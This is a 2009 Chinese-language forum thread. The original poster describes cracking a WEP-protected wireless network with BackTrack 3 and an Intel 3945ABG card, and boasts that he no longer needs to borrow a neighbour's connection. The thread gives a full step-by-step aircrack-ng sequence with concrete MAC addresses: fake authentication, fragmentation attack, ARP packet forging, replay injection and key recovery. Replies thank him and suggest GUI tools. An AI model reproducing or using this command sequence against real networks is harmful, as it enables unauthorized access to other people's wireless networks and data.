888no 发表于 2009-3-22 10:01

Intel3945ABG在BT3下破解 破解成功!

经过一个星期时间的研究终于用3945网卡破解出了密码~~~经验分享

以下是我的经验请分享!

BT3USB版本在硬盘启动自己改的启动项

经过很多次的实验终于启动了BT3并且启动了3945网卡,这个可是要花时间去实验才得出的正确开启方法!请大家不要那么轻易的放弃!

aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0进行连接成功后Data已经增长速度很快,但是还没有理想中的那么快 ,于是我想进行攻击但是获得xor文件这个步骤一直没有成功,因为已经是深夜DATA数据很慢,估计是没有任何的客户端;

我就让它慢慢抓

等早上起来是发现已经到了 18000多于是我就用
aircrack-ng -n 64 -b ap的mac name-01.ivs命令几秒钟的时间就把密码破解出来了!!

嘿嘿 回到WIN进行连接成功!!测试速度2M爽啊 !这下终于不用在借用隔壁那个慢的要死的512K的网络了~~~

哈哈发本贴 是Ceng网的~~速度超快哦!!

今天继续研究 如何获得获得xor文件体验超快速度破解!!希望加支持我!

以下是我编辑的根据实战经验做的更改资料 ,请大家参考!!希望没有破解成功的朋友也能早日破解出快速通道^_^

888no 发表于 2009-3-22 10:20

:victory:大家多捧场哦!!

不知道以后那位高人可以把这些命令做成一个在BT3中针对3945网卡的批处理文件 ,这样的话很多刚入门的朋友就方便很多了!

1、modprobe -r iwl3945
2、modprobe ipwraw
3、ifconfig -a wifi0 up
4、iwconfig
5、ifconfig -a
6、airmon-ng start wifi0 1
7、airodump-ng --ivs -w pack -c 1 wifi0
8、aireplay-ng -1 0 -e HG520s -a 0016E3C70A5B -h 001F3C6CFDE1 wifi0
9、aireplay-ng -5 -b 0016E3C70A5B -h 001F3C6CFDE1 wifi0
10、packetforge-ng -0 -a 0016E3C70A5B -h 001F3C6CFDE1 -k 255.255.255.255 -l 255.255.255.255 -y -w mrarp
11、aireplay-ng -2 -r mrarp -x 256 wifi0
12、aircrack-ng -n 64 -b 0016E3C70A5B pack-01.ivs

sex363 发表于 2009-3-22 10:29

支持下!!我有的不是那个网卡!旧的就是!!!

ktj98 发表于 2009-3-22 12:35

没成功啊,笔记本没找到无线网卡.

powerpc2008 发表于 2009-3-22 12:35

spoonwep图形界面不是很好用吗,为什么好些帖子都用命令行的。光盘版+3945abg 2分钟就破了个wep密码

苏一丁 发表于 2009-3-22 14:10

感谢楼主分享啊!!

888no 发表于 2009-3-22 21:22

把这些命令根据要破解的WEPMAC编辑好,然后放在BT3文件里 ,启动BT3后直接打开该文件往上面复制就OK了!!大家试一试吧!这样就不用一个一个的输入了!

888no 发表于 2009-3-23 14:20

昨天晚上又成功的破解了一个WEP512KB的哈哈; 复制到BT3文件后复制黏贴非常快!!

从启动到破解只要了5分钟

ken520 发表于 2009-3-25 11:16

太好了,十分感谢

hfx615 发表于 2009-3-26 16:14

谢谢,我试用一下

abutter 发表于 2009-3-26 18:21

多谢,分享经验,我的也是 3945ABG 的。

abutter 发表于 2009-3-26 18:30

楼主的文档被人整合了,呵呵。
页: [1] 2 3 4
查看完整版本: Intel3945ABG在BT3下破解 破解成功!